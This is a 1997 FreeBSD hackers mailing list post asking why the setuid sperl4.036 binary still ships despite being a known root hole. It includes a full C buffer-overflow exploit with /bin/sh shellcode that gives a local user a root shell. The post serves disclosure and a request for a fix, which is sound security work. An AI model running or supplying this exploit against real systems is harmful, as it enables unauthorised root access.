From owner-freebsd-hackers  Sun Sep 14 22:14:32 1997
Return-Path: <owner-freebsd-hackers>
Received: (from root@localhost)
          by hub.freebsd.org (8.8.7/8.8.7) id WAA29751
          for hackers-outgoing; Sun, 14 Sep 1997 22:14:32 -0700 (PDT)
Received: from krusty.the.clown.engelska.se (nonxstnt@not.of.this.world.engelska.se [193.14.46.5])
          by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id WAA29738
          for <freebsd-hackers@FreeBSD.org>; Sun, 14 Sep 1997 22:14:25 -0700 (PDT)
Received: from localhost (nonxstnt@localhost)
	by krusty.the.clown.engelska.se (8.8.7/8.8.7) with SMTP id GAA22324
	for <freebsd-hackers@FreeBSD.org>; Mon, 15 Sep 1997 06:30:44 +0200 (CEST)
Date: Mon, 15 Sep 1997 06:30:43 +0200 (CEST)
From: Existence is Futile <nonxstnt@not.of.this.world.engelska.se>
To: freebsd-hackers@FreeBSD.org
Subject: Why SPERL? 
Message-ID: <Pine.BSF.3.96.970915062637.22299A-100000@krusty.the.clown.engelska.se>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-hackers@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Someone posted a similar message earlier, but I never saw a reply (might
have been because the mailserver for this domain is Linux.. hehe). But I
just want to bring it to your attention again.

Why does even the latest RELENG (that I've used) include sperl4.036? when
it's a well known way to get root? it came in handy today when some guy
couldn't su because he wasnt in the wheel group and couldn't login as root
any other way (being 45 minutes away). But, it's a serious security flaw!

Perhaps we shouldn't include sperl4.036? or turn its suid off. I'm not
sure if 4.0 is still being maintained, so I dont know if there is a newer
version available, but I dont believe it acceptable to purposely leave
root holes in. 

Of course, this may have already been fixed and I'm just blowing hot air
all around, but its an old exploit and the august releng's at least
include it. 

/************************************************************/
/*   Exploit for FreeBSD sperl4.036 by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

char *get_esp(void) {
        asm("movl %esp,%eax");
}

char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
    int i;
    char execshell[] =
                       "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
                       "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
                       "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
                       "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    for(i=0+1;i<BUFFER_SIZE-4;i+=4)
       *(char **)&buf[i] = get_esp() - OFFSET;

    memset(buf,0x90,768+1);
    memcpy(&buf[768+1],execshell,strlen(execshell));

    buf[BUFFER_SIZE-1]=0;

    execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}


--
thomas stromberg . system admin @ Royal Institute of Technology, Stockholm
nobody@darkening.com (nobody@EFnet), talk:nobody@krusty.the.clown.engelska.se